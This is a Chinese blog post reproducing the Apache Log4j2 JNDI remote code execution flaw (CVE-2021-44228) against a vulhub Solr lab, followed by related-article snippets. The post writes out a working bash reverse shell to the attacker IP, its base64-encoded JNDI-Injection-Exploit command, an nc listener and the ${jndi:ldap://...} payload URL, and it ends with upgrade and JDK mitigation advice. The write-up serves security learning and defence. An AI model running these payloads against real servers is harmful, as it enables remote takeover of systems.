Apache Log4j2 远程代码执行漏洞复现 (CVE-2021-44228)

最新推荐文章于 2024-05-11 10:15:57 发布
最新推荐文章于 2024-05-11 10:15:57 发布
阅读量1.2k 收藏 2
点赞数 2
分类专栏: 漏洞复现 文章标签: apache log4j linux 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44433172/article/details/125441176
版权

引言

       Log4j是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。

实验环境

攻击机(Win10):172.20.10.2
受害机(Linux):172.20.10.10、vulhub

复现过程

vulhub 放入docker中,直接docker-compose up -d,一键启动环境。
在这里插入图片描述开始漏洞利用,首先我们构造反弹shell用到的命令:

bash -i >& /dev/tcp/反弹shell的主机ip/端口号 0>&1

这里是IP是:172.20.10.2,端口号:6666,反弹shell需要经过编码,所以我们对上面那段命令base64编码。
在这里插入图片描述
加密完毕后把结果复制下来,构造payload,应用工具JNDI-Injection-Exploit搭建服务:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMTAuMi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.20.10.2"

-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址
在这里插入图片描述可以看到有三个服务,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入:
在注入之前,使用nc进行端口监听

nc -lvvp 端口号

这里构造的端口号是6666
在这里插入图片描述然后回到solr页面,进行payload构造

http://172.20.10.10:8983/solr/admin/cores?action=${jndi:ldap://172.20.10.2:1389/twce0q}

直接访问:
在这里插入图片描述可以看到网页被重定向到了我们的恶意类地址:
在这里插入图片描述现在去nc上,查看是否反弹shell成功
在这里插入图片描述弹回来了,输入几个命令测试,大功告成。

修复建议

目前,Apache官方已发布新版本完成漏洞修复,建议及时升级至最新版本:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

建议同时采用如下临时措施进行漏洞防范:

1.JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

2.部署使用第三方防火墙产品进行安全防护。

曲自清
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-44228Apache log4j 远程命令执行
weixin_45253622的博客
12-19 4021
漏洞简介 Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞CVE-2021-44228)。 Apache Log4j2远程代码执行漏洞由Lookup功能引发。Log4j2在默认情况下会开启Lookup功能,用于将特殊值添加到日志中。此功能中也支持对JNDI的Lookup,但由于Lookup对于加载的JNDI内容未做任何限制,使得攻击者可以通过JNDI注入实现远程加载恶意类到应用
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1319
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
Log4j2远程命令执行(CVE-2021-44228)复现
weixin_47781572的博客
03-01 6320
漏洞说明 Log4jApache的开源日志记录组件。Log4j2Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。 由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Log4j2漏洞复现CVE-2021-44228
最新发布
qq_40860153的博客
05-11 488
3、解析到ldap,就会去192.168.96.1:1099的ldap服务找名为shell的资源,找到shell之后,就会将资源信息返回给应用程序的log4j组件,而log4j组件就会将资源下载下来,然后发现shell是一个.class文件,就会去执行里面的代码,从而实现注入。在log4j框架的基础上进行了改进,并引入了丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。观察dns网站解析日志结果,刷新,发现解析成功,说明漏洞存在。
log4j2 远程代码执行漏洞复现CVE-2021-44228
Welcome To Myon'Blog !
03-08 4703
log4jApache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程
I8929545452_VD的博客
04-08 956
在/solr/admin/cores?注意别忘了将url中的ip改为靶机ip,注入部分中的3dto27.dns.log.cn改为你在Get SubDomin获取的子域名。如果存在log4j2漏洞,我们将在DNSLog平台看到回显。返回刚才的DNSLog平台,点击刷新记录Refresh Record(可能比较慢,不要着急,可以多点几次Refresh Record),可以看到有数据:在DNS Query Record一栏下面出现了条目,回显了java版本1.8.0_102,说明存在log4j漏洞
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
Apache Dubbo远程代码执行漏洞(CVE-2021-43297)
10-25
将 Dubbo 升级到 2.6.12、2.7.15、3.0.5 及以上版本
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中存在反序列化远程代码执行漏洞.攻击者可利用该漏洞执行任意恶意命令.在Log4j 1.2.X中包含一个SocketServer类,该类很容易对不可信数据进行反序列化,当侦听日志数据的不可信网络流量时,与反序列化小工具结合使用时,可以利用该类远程执行任意代码.影响包含目前最新版本. 2. 漏洞危害 高危 影响范围 1.2.4 <= Apache Log4j <= 1.2.17(最新版) 修复建议 1.升级到Apache Log4j 2系列最新版 2.禁止将该类所开启的socket端口暴露到互联网 3. 漏洞验证 Apac
log4j2远程代码执行漏洞复现CVE-2021-44228
Wshchf的博客
06-04 615
Apache log4j2—RCE 漏洞是由于Log4j2 提供的lookup功能下的jndi Lookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的数据进行判断,导致Log4j2 请求远程主机上含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
Log4j远程代码执行漏洞CVE-2021-44228漏洞复现
Boom!脑洞大爆炸的博客
07-07 538
Log4j远程代码执行漏洞CVE-2021-44228漏洞复现
CVE-2021-44228 Apache log4j 远程命令执行漏洞
mirocky的博客
10-26 1023
log4j(log for java)是由Java编写的可靠、灵活的日志框架,是Apache旗下的一个开源项目,使用Log4j,我们更加方便的记录了日志信息,它不但能控制日志输出的目的地,也能控制日志输出的内容格式;通过定义不同的日志级别,可以更加精确的控制日志的生成过程,从而达到我们应用的需求;由于log4j提供了lookup机制,使日志中的${}也可进行执行,在其中输入JNDI的payload,即可进行执行。此处必须复制无版本号的rmi,否则不会成功,理由未知。使用开源的dnslog:ceye.io。
Apache_Log4j2_RCE漏洞复现CVE-2021-44228
qq_45751902的博客
10-05 800
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
weixin_45715461的博客
06-28 3918
CVE-2021-44228 Apache Log4j2远程代码执行漏洞复现
Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程
weixin_46622976的博客
12-13 6995
首先我们要理解漏洞产生的原因,存在漏洞的机器为LDAP客户端,我们构造payload地址为自己的LDAP服务端,自己服务端会去HTTP服务器加载恶意文件。(验证的话,payload直接为DNS服务器即可) 以github上项目为例:GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行 一、编译exp,并放置在HTTP服务器,等待LDAP服务器来下载 git clone https://gith...
Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31
星之空
12-31 738
还是稍微记录一下这个害得大家加班的大bug。 发生版本 Log4j versions 2.0 through 2.14.1。 (更新到2.15也不行。) 解决方案 升级到2.17.0 2.16还是有bug。 https://logging.apache.org/log4j/2.x/ 如果不能升级 加JVM参数:-Dlog4j2.formatMsgNoLookups=true 如果没有用,直接删掉:zip -q -d log4j-core-*.jar org/apache/logging/log4j/cor
目标可能存在Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)怎么修复
07-13
对于 Apache Log4j2 远程代码执行漏洞CVE-2021-44228),修复步骤如下: 1. 首先,确认你的应用程序是否使用了 Apache Log4j2。如果使用了,需要升级到修复了漏洞的版本。你可以查看 Apache Log4j2 的官方网站或者软件包管理工具获取最新版本的信息。 2. 如果升级不可行,你可以考虑使用以下两种临时解决方案之一: - 在应用程序的配置文件中,禁用 JNDI 查找功能,通过设置以下参数实现: ``` log4j2.formatMsgNoLookups=true ``` 这样可以禁用 JNDI 注入。 - 或者,通过设置系统属性来禁用 Log4j 的 JNDI 特性: ``` -Dlog4j2.formatMsgNoLookups=true ``` 这样可以在应用程序启动时禁用 JNDI 注入。 注意:这两种解决方案都是临时性的,建议尽快升级到修复版本。 3. 检查你的应用程序,确保没有直接或间接使用了受影响的 Log4j2 版本。如果有其他依赖库或框架使用了 Log4j2,需要确认它们是否已经更新到修复版本。 4. 定期检查和更新你的应用程序和依赖库。及时

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值